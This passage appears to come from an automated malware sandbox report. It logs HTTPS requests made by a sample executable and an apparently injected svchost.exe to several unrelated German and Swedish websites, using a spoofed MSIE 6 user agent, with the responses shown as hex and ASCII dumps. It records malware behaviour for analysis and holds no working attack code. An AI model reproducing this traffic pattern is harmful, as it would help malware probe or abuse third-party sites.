                                                                                                                                                                                                                                                  Host: diamir.de
                                                                                                                                                                                                                                                  2023-07-27 19:53:54 UTC1419INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:54 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 162
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Location: https://www.diamir.de/
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                  2023-07-27 19:53:54 UTC1419INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  14192.168.2.457238188.114.96.7443C:\Users\user\Desktop\CX17SY6xF6.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:54 UTC1418OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: hyab.se
                                                                                                                                                                                                                                                  2023-07-27 19:53:54 UTC1471INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:54 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Location: https://hyab.com
                                                                                                                                                                                                                                                  Cache-Control: max-age=600
                                                                                                                                                                                                                                                  Expires: Thu, 27 Jul 2023 20:03:54 GMT
                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ie7pYE4zu%2B3mTffv7WwmHjBs%2FePCx8B08TAyin%2BWrEqh0KZwhthfTwoqgDxIwAVly%2B%2FVDNZT3eXgp6gzpgE2vzoTA5Zdk8jxpgGTV4DoeFEkEs9nPpxZhQyE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 7ed76e65c8b9bbc2-FRA
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  2023-07-27 19:53:54 UTC1472INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                  2023-07-27 19:53:54 UTC1472INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  15192.168.2.4568955.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:54 UTC1419OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                  2023-07-27 19:53:54 UTC1419INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:54 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                  Last-Modified: Fri, 30 Jun 2023 05:41:10 GMT
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Content-Length: 53069
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                  2023-07-27 19:53:54 UTC1419INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                  2023-07-27 19:53:54 UTC1435INData Raw: 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65 73 73 74 65 63 68 6e 69 6b 2f 76 65 72 73 63 68 6c 69 65 73 73 6d 61 73 63 68 69 6e 65 6e 22 20 74 69 74 6c 65 3d 22 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                  Data Ascii: item layout-0 "> <a href="/verschliesstechnik/verschliessmaschinen" title="Verschliemaschinen"> Verschliemaschinen </a>
                                                                                                                                                                                                                                                  2023-07-27 19:53:54 UTC1451INData Raw: 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 6c 61 6e 64 73 63 61 70 65 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 75 73 65 72 5f 75 70 6c 6f 61 64 2f 4e 61 63 68 68 61 6c 74 69 67 6b 65 69 74 2f 63 73 6d 5f 6d 65 74 61 6c 5f 72 65 63 79 63 6c 65 73 5f 66 6f 72 65 76 65 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65
                                                                                                                                                                                                                                                  Data Ascii: r.jpg"><source media="(max-width: 767px) and (orientation:landscape)" srcset="/fileadmin/user_upload/Nachhaltigkeit/csm_metal_recycles_forever.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/file
                                                                                                                                                                                                                                                  2023-07-27 19:53:54 UTC1467INData Raw: 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64
                                                                                                                                                                                                                                                  Data Ascii: srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  16192.168.2.45743335.214.171.193443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:55 UTC1472OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: flamingorecordings.com
                                                                                                                                                                                                                                                  2023-07-27 19:53:55 UTC1472INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:55 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 75193
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  ETag: "61e91823-125b9"
                                                                                                                                                                                                                                                  Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                                                  X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                                                  2023-07-27 19:53:55 UTC1473INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex"
                                                                                                                                                                                                                                                  2023-07-27 19:53:55 UTC1488INData Raw: 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 35 39 2e 30 33 31 20 31 39 35 2e 32 36 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 36 33 2e 32 35 38 20 31 39 38 2e 39 34 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 34 37 2e 32 32 35 20 31 39 35 2e 32 36 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 35 31 2e 34 35 32 20 31 39 38 2e 39 34 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 33 35 2e 34 31 39 20 31 39 35 2e
                                                                                                                                                                                                                                                  Data Ascii: fill="#fff"/><polygon points="197.11 59.031 195.268 61.144 197.11 63.258 198.948 61.144 197.11 59.031" fill="#fff"/><polygon points="197.11 47.225 195.268 49.338 197.11 51.452 198.948 49.338 197.11 47.225" fill="#fff"/><polygon points="197.11 35.419 195.
                                                                                                                                                                                                                                                  2023-07-27 19:53:55 UTC1504INData Raw: 20 31 31 33 2e 31 35 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 36 33 2e 32 35 38 20 31 31 36 2e 38 33 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 20 31 31 33 2e 31 35 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 35 31 2e 34 35 32 20 31 31 36 2e 38 33 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 33 35 2e 34 31 39 20 31 31 33 2e 31 35 34 20 33 37 2e 35 33 32 20 31 31 34 2e 39 39 36 20 33 39 2e 36 34 36 20 31 31 36 2e 38 33 34 20 33 37 2e 35
                                                                                                                                                                                                                                                  Data Ascii: 113.154 61.144 114.996 63.258 116.834 61.144 114.996 59.031" fill="#fff"/><polygon points="114.996 47.225 113.154 49.338 114.996 51.452 116.834 49.338 114.996 47.225" fill="#fff"/><polygon points="114.996 35.419 113.154 37.532 114.996 39.646 116.834 37.5
                                                                                                                                                                                                                                                  2023-07-27 19:53:55 UTC1520INData Raw: 34 2e 39 32 31 20 32 34 30 2e 30 34 32 20 31 34 32 2e 38 30 38 20 32 33 38 2e 32 30 33 20 31 34 30 2e 36 39 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 37 2e 35 36 35 20 32 35 30 2e 33 31 36 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 33 2e 33 33 37 20 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 38 2e 34 37 38 20 32 31 35 2e 37 35 39 20 32 35 30 2e 33 31 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 31 2e 35 33 31 20 32 34 36 2e 36 33 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 35
                                                                                                                                                                                                                                                  Data Ascii: 4.921 240.042 142.808 238.203 140.694" fill="#fff"/><polygon points="246.638 225.451 248.478 227.565 250.316 225.451 248.478 223.337 246.638 225.451" fill="#fff"/><polygon points="248.478 215.759 250.316 213.645 248.478 211.531 246.636 213.645 248.478 215
                                                                                                                                                                                                                                                  2023-07-27 19:53:55 UTC1536INData Raw: 38 20 39 34 2e 34 34 38 20 32 30 33 2e 39 35 32 20 39 36 2e 32 38 36 20 32 30 31 2e 38 33 38 20 39 34 2e 34 34 38 20 31 39 39 2e 37 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 20 39 32 2e 36 31 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 39 32 2e 31 34 36 20 39 36 2e 32 38 36 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33 20 39 32 2e 36 31 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 38 30 2e 33 34 20 39 36 2e 32 38 36 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33
                                                                                                                                                                                                                                                  Data Ascii: 8 94.448 203.952 96.286 201.838 94.448 199.725" fill="#fff"/><polygon points="94.448 187.919 92.61 190.032 94.448 192.146 96.286 190.032 94.448 187.919" fill="#fff"/><polygon points="94.448 176.113 92.61 178.226 94.448 180.34 96.286 178.226 94.448 176.113


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  17192.168.2.457464185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:57 UTC1546OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: techtrans.de
                                                                                                                                                                                                                                                  2023-07-27 19:53:57 UTC1546INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:57 GMT
                                                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                  Expires: 0
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                                                                                                  Connection: Upgrade, close
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  2023-07-27 19:53:57 UTC1546INData Raw: 32 63 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                  Data Ascii: 2c3<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  18192.168.2.457472185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:57 UTC1547OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: techtrans.de
                                                                                                                                                                                                                                                  2023-07-27 19:53:57 UTC1547INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:57 GMT
                                                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                  Expires: 0
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                                                                                                  Connection: Upgrade, close
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  2023-07-27 19:53:57 UTC1548INData Raw: 32 63 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                  Data Ascii: 2c3<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  19192.168.2.45772394.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:58 UTC1548OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: www.diamir.de
                                                                                                                                                                                                                                                  2023-07-27 19:53:58 UTC1549INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:58 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
